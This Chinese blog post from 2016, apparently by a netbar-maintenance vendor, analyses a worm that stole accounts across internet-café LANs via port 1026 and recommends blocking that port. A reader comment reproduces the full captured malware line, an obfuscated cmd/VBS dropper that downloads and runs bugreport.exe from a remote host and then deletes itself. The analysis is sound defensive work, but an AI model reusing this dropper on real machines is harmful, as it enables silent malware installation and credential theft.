关于近期网吧批量盗号的分析与解决,死亡1026 更新2016.08.15

  2016年08月15日  深蓝  10122 阅读  21 评论

近期,有多位用户在深蓝软件SVIP群里反应了遭遇大面积盗号的情况,希望大家一起分析,因为群里都是些上百家的大网维,很快大家对情况进行了汇总和分析。

首先大家注意看cmd.exe 与  cscript.exe 两个文件被利用并连接了不同的电脑的IP。

006.png

005.jpg

 

同时有SVIP用户反应了该病毒在他的网吧通过 1026端口来传播病毒,并抓住了一段VBS,深蓝简单分析一下这段VBS的含义:

这段VBS代码首先是创建了一个对象,为了迷惑用户和杀毒,采取了 replace在命令中插入多个无用的字符,再在使用前替换掉字符。

然后通过 http://的方式下载 bugreport.exe 文件,之后该 VBS以参数的形式运行  ospp.vbs 192.168.0.172:1026 传入IP与端口。

最后VBS在运行完所有功能后会删除自身。

001.jpg

 

下载的病毒是免杀的,是否是收费机中毒还是和收费软件被利用有关?有待进一步验证。

003.jpg

 

扫描局域网后发现只有收费机开了1026端口。

004.jpg

 

解决办法

用户测试后,屏蔽1026口后问题解决。后面端口可能会变,思路就是这样,灵活去处理吧。

 

评论中的补充,感谢cwfwan

cmd /c "echo dim m,s,k:m=^"MEiEcErEosoft.XEMELEHETETEP^":b=^"ACDCOCDCBC.CSCtCrCeCaCm^":k=^"ScKriptKing.FiKleSystKemObjKect^":Set x=CreateObject(replace(m,^"E^",^"^")):Set w=CreateObject(^"Wscript.Shell^"):Set v=w.Environment(^"Process^"):x.Open ^"GET^",replace(^"hEtEtpE:E//^",^"E^",^"^") ^& Wscript.Arguments(0) ^& ^"/www/bugreport.exe^",0:x.Send():If x.status=200 Then:Set s=CreateObject(replace(b,^"C^",^"^")):s.Mode=3:s.Type=1:s.Open():f=v.Item(^"APPDATA^") ^& ^"\bugreport.exe^":s.Write x.ResponseBody:s.SaveToFile f,2:wscript.sleep(1000):w.Run(^"cmd /c ^"^"^" ^& f ^& ^"^"^"^"):End If:Set o=CreateObject(replace(k,^"K^",^"^")):o.DeleteFile(wscript.scriptfullname)" ˃ C:\WINDOWS\ospp.vbs

更新 2016.08.06

  感谢用户抓到样本发过来,供分析。

更新 2016.08.15

  开机命令加入了cscript.exe和wscript.exe这2个文件的映像劫持了 //感谢网友 让故事继续 提供

       Tag网吧病毒局域网病毒盗号解决


       点此留言,请求帮助,建议,或者反馈问题。